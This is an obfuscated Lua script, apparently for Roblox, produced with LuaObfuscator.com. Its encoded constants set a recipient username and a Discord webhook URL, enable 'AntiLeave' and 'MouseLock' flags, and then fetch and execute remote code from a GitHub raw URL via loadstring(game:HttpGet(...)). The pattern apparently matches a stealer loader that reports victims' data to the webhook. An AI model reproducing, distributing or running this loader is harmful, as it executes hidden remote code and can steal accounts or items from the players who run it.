--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.15) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v81=v2(v0(v30,16));if v19 then local v89=v5(v81,v19);v19=nil;return v89;else return v81;end end end);local function v20(v31,v32,v33)if v33 then local v82=0 -0 ;local v83;while true do if (v82==(0 -0)) then v83=(v31/((3 -1)^(v32-((1639 -(1523 + 114)) -1))))%((2 + 0)^(((v33-(620 -(555 + 64))) -(v32-(932 -(857 + 74)))) + (569 -(367 + 201)))) ;return v83-(v83%(928 -(214 + 713))) ;end end else local v84=(1 + (1 -0))^(v32-(1 + 0)) ;return (((v31%(v84 + v84))>=v84) and (878 -(282 + 595))) or (1065 -(68 + 997)) ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35=1270 -(226 + 1044) ;local v36;local v37;while true do if (v35==((9 -5) -3)) then return (v37 * (373 -(32 + 85))) + v36 ;end if (v35==(0 + 0)) then v36,v37=v1(v16,v18,v18 + 1 + (1 -0) );v18=v18 + 2 ;v35=958 -(892 + 65) ;end end end local function v23()local v38,v39,v40,v41=v1(v16,v18,v18 + (4 -(1 + 0)) );v18=v18 + (354 -(87 + 263)) ;return (v41 * 16777216) + (v40 * (65716 -(67 + 113))) + (v39 * 256) + v38 ;end local function v24()local v42=v23();local v43=v23();local v44=2 -1 ;local v45=(v20(v43,(19 -(10 + 8)) + 0 ,79 -59 ) * ((7 -5)^(984 -(802 + 150)))) + v42 ;local v46=v20(v43,56 -35 ,55 -24 );local v47=((v20(v43,24 + 8 )==(998 -(915 + 82))) and  -1) or (2 -1) ;if (v46==(0 + 0)) then if (v45==(0 -0)) then return v47 * (1187 -(1069 + 118)) ;else v46=1;v44=442 -(416 + 26) ;end elseif (v46==(4643 -2596)) then return ((v45==(0 -0)) and (v47 * ((1 + 0)/((0 -0) -0)))) or (v47 * NaN) ;end return v8(v47,v46-(1015 + 4 + 4) ) * (v44 + (v45/((793 -(368 + 423))^(163 -111)))) ;end local function v25(v48)local v49;if  not v48 then v48=v23();if (v48==(0 -0)) then return "";end end v49=v3(v16,v18,(v18 + v48) -(439 -(145 + 293)) );v18=v18 + v48 ;local v50={};for v65=1, #v49 do v50[v65]=v2(v1(v3(v49,v65,v65)));end return v6(v50);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v51=0;local v52;local v53;local v54;local v55;local v56;local v57;local v58;while true do if ((10 -7)==v51) then v58=nil;while true do local v90=0;local v91;while true do if (v90~=(29 -(22 + 7))) then else v91=0 + 0 ;while true do if ((1 + 0)==v91) then if (v52==(1986 -(1266 + 719))) then local v99=0;local v100;while true do if (0==v99) then v100=0;while true do if (v100==0) then local v165=0;while true do if (v165~=0) then else v56={v53,v54,nil,v55};v57=v23();v165=1 + 0 ;end if (v165==1) then v100=1;break;end end end if (v100==(1457 -(282 + 1174))) then v58={};v52=2;break;end end break;end end end if (v52~=0) then else local v101=0;while true do if (v101~=0) then else v53={};v54={};v101=1;end if (v101==1) then v55={};v52=1;break;end end end break;end if (v91==(811 -(569 + 242))) then local v98=0;while true do if (v98==(0 -0)) then if (v52==2) then for v146=1,v57 do local v147=0 + 0 ;local v148;local v149;local v150;local v151;while true do if (v147==2) then while true do if (v148~=0) then else local v168=0;local v169;while true do if (0~=v168) then else v169=1024 -(706 + 318) ;while true do if (v169==(1251 -(721 + 530))) then local v179=1271 -(945 + 326) ;while true do if (v179~=0) then else v149=0 -0 ;v150=nil;v179=1 + 0 ;end if (v179~=(701 -(271 + 429))) then else v169=1 + 0 ;break;end end end if ((1501 -(1408 + 92))==v169) then v148=1087 -(461 + 625) ;break;end end break;end end end if (v148~=1) then else v151=nil;while true do if (v149==(1289 -(993 + 295))) then if (v150==(1 + 0)) then v151=v21()~=0 ;elseif (v150==2) then v151=v24();elseif (v150~=3) then else v151=v25();end v58[v146]=v151;break;end if (v149==0) then local v177=0;local v178;while true do if (0==v177) then v178=0;while true do if (v178==(1172 -(418 + 753))) then v149=1 + 0 ;break;end if (0==v178) then v150=v21();v151=nil;v178=1;end end break;end end end end break;end end break;end if (v147==1) then v150=nil;v151=nil;v147=1 + 1 ;end if (v147==0) then v148=0;v149=nil;v147=1 + 0 ;end end end v56[1 + 2 ]=v21();for v152=530 -(406 + 123) ,v23() do local v153=1769 -(1749 + 20) ;local v154;local v155;while true do if (v153~=(1 + 0)) then else while true do if (v154==(1322 -(1249 + 73))) then v155=v21();if (v20(v155,1,1 + 0 )~=(1145 -(466 + 679))) then else local v170=0;local v171;local v172;local v173;local v174;local v175;while true do if (v170~=2) then else v175=nil;while true do if (v171==(2 -1)) then local v180=0 -0 ;while true do if (0~=v180) then else v174=nil;v175=nil;v180=1;end if (v180~=1) then else v171=2;break;end end end if (v171~=2) then else while true do if (v172~=1) then else local v182=1900 -(106 + 1794) ;local v183;while true do if (v182==0) then v183=0;while true do if (v183~=0) then else local v192=0 + 0 ;local v193;while true do if (v192~=0) then else v193=0;while true do if (v193==1) then v183=1 + 0 ;break;end if (v193~=(0 -0)) then else local v197=0;while true do if (v197~=(2 -1)) then else v193=115 -(4 + 110) ;break;end if ((584 -(57 + 527))==v197) then v175={v22(),v22(),nil,nil};if (v173==(103 -(17 + 86))) then local v199=0;local v200;while true do if (v199~=(0 + 0)) then else v200=0;while true do if (v200==0) then v175[6 -3 ]=v22();v175[11 -7 ]=v22();break;end end break;end end elseif (v173==(167 -(122 + 44))) then v175[3]=v23();elseif (v173==(2 -0)) then v175[9 -6 ]=v23() -(2^(14 + 2)) ;elseif (v173~=(1 + 2)) then else local v209=0;local v210;while true do if (v209~=(0 -0)) then else v210=0;while true do if ((65 -(30 + 35))==v210) then v175[3 + 0 ]=v23() -((1259 -(1043 + 214))^(60 -44)) ;v175[1216 -(323 + 889) ]=v22();break;end end break;end end end v197=1;end end end end break;end end end if (v183~=(2 -1)) then else v172=2;break;end end break;end end end if (v172==2) then local v184=0;local v185;while true do if (v184==(580 -(361 + 219))) then v185=0;while true do if (v185==1) then v172=3;break;end if (v185~=(320 -(53 + 267))) then else local v194=0 + 0 ;local v195;while true do if (v194~=(413 -(15 + 398))) then else v195=982 -(18 + 964) ;while true do if (v195==1) then v185=3 -2 ;break;end if (v195~=(0 + 0)) then else local v198=0 + 0 ;while true do if (v198==0) then if (v20(v174,1,1)==1) then v175[852 -(20 + 830) ]=v58[v175[2]];end if (v20(v174,2 + 0 ,2)~=1) then else v175[3]=v58[v175[3]];end v198=1;end if (v198~=1) then else v195=127 -(116 + 10) ;break;end end end end break;end end end end break;end end end if (v172==0) then local v186=0 + 0 ;local v187;local v188;while true do if ((738 -(542 + 196))~=v186) then else v187=0 -0 ;v188=nil;v186=1 + 0 ;end if (v186==1) then while true do if (v187==0) then v188=0 + 0 ;while true do if (v188==(0 + 0)) then local v196=0;while true do if (v196~=0) then else v173=v20(v155,2,7 -4 );v174=v20(v155,4,15 -9 );v196=1;end if ((1552 -(1126 + 425))~=v196) then else v188=406 -(118 + 287) ;break;end end end if (v188==1) then v172=1;break;end end break;end end break;end end end if (v172==(11 -8)) then if (v20(v174,3,1124 -(118 + 1003) )==(2 -1)) then v175[4]=v58[v175[4]];end v53[v152]=v175;break;end end break;end if (v171==(377 -(142 + 235))) then local v181=0;while true do if (v181==1) then v171=1;break;end if ((0 -0)==v181) then v172=0;v173=nil;v181=1;end end end end break;end if (v170==1) then v173=nil;v174=nil;v170=2;end if (v170==(0 + 0)) then v171=0;v172=nil;v170=978 -(553 + 424) ;end end end break;end end break;end if (v153~=0) then else v154=0 -0 ;v155=nil;v153=1 + 0 ;end end end v52=3;end if (v52==(3 + 0)) then local v130=0;while true do if (v130~=(0 + 0)) then else for v166=1 + 0 ,v23() do v54[v166-(1 + 0) ]=v28();end return v56;end end end v98=2 -1 ;end if (v98==1) then v91=2 -1 ;break;end end end end break;end end end break;end if (v51~=(2 -1)) then else local v87=0;while true do if (v87==(0 + 0)) then v54=nil;v55=nil;v87=4 -3 ;end if (v87==(754 -(239 + 514))) then v51=1 + 1 ;break;end end end if (v51==2) then v56=nil;v57=nil;v51=3;end if (v51==(1329 -(797 + 532))) then local v88=0;while true do if (1==v88) then v51=1 + 0 ;break;end if (0~=v88) then else v52=0 + 0 ;v53=nil;v88=1;end end end end end local function v29(v59,v60,v61)local v62=v59[1];local v63=v59[2];local v64=v59[3];return function(...)local v67=v62;local v68=v63;local v69=v64;local v70=v27;local v71=1;local v72= -1;local v73={};local v74={...};local v75=v12("#",...) -1 ;local v76={};local v77={};for v85=0,v75 do if (v85>=v69) then v73[v85-v69 ]=v74[v85 + 1 ];else v77[v85]=v74[v85 + 1 ];end end local v78=(v75-v69) + 1 ;local v79;local v80;while true do local v86=0;while true do if (1==v86) then if (v80<=9) then if (v80<=4) then if (v80<=1) then if (v80==0) then local v102=v79[2];local v103,v104=v70(v77[v102](v13(v77,v102 + 1 ,v79[3])));v72=(v104 + v102) -1 ;local v105=0;for v125=v102,v72 do local v126=0;while true do if (v126==0) then v105=v105 + 1 ;v77[v125]=v103[v105];break;end end end else v77[v79[2]]=v79[3];end elseif (v80<=2) then v77[v79[2]]();elseif (v80==3) then v77[v79[2]]=v79[3]~=0 ;else local v132=v79[2];local v133=v77[v79[3]];v77[v132 + 1 ]=v133;v77[v132]=v133[v79[4]];end elseif (v80<=6) then if (v80>5) then local v108=0;local v109;local v110;while true do if (1==v108) then v77[v109 + 1 ]=v110;v77[v109]=v110[v79[4]];break;end if (v108==0) then v109=v79[2];v110=v77[v79[3]];v108=1;end end else v77[v79[2]]=v61[v79[3]];end elseif (v80<=7) then v77[v79[2]][v79[3]]=v79[4];elseif (v80>8) then do return;end else v77[v79[2]][v79[3]]=v79[4];end elseif (v80<=14) then if (v80<=11) then if (v80>10) then do return;end else v61[v79[3]]=v77[v79[2]];end elseif (v80<=12) then local v117=v79[2];local v118,v119=v70(v77[v117](v13(v77,v117 + 1 ,v79[3])));v72=(v119 + v117) -1 ;local v120=0;for v127=v117,v72 do local v128=0;while true do if (v128==0) then v120=v120 + 1 ;v77[v127]=v118[v120];break;end end end elseif (v80>13) then local v139=v79[2];v77[v139]=v77[v139](v13(v77,v139 + 1 ,v72));else local v141=v79[2];v77[v141]=v77[v141](v13(v77,v141 + 1 ,v72));end elseif (v80<=16) then if (v80==15) then v77[v79[2]]=v79[3];else v61[v79[3]]=v77[v79[2]];end elseif (v80<=17) then v77[v79[2]]();elseif (v80>18) then v77[v79[2]]=v79[3]~=0 ;else v77[v79[2]]=v61[v79[3]];end v71=v71 + 1 ;break;end if (v86==0) then v79=v67[v71];v80=v79[1];v86=1;end end end end;end return v29(v28(),{},v17)(...);end v15("LOL!0E3O0003083O00557365724E616D65030C3O0063617665697261313534333903073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O31343337302O3430333839313732343339312F33476A3459734C64433053513457324E4744696E4F544C3678496E736E3654307036335A7131335F473057445F39416D2O716E78595A423046746177743168445273545103093O00557365724E616D653203023O005F47030D3O004C6F6164696E675363722O656E2O0103093O00416E74694C6561766503093O004D6F7573654C6F636B030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574033F3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F2O786E65766572302F464154414C2F6D61696E2F57447363726970747300153O00120F3O00023O0012103O00013O00120F3O00043O0012103O00033O00120F3O00023O0012103O00053O002O123O00063O0030083O00070008002O123O00063O0030083O00090008002O123O00063O0030083O000A0008002O123O000B3O002O120001000C3O00200400010001000D00120F0003000E4O0013000400014O000C000100044O000D5O00022O00023O000100012O00093O00017O00",v9(),...);
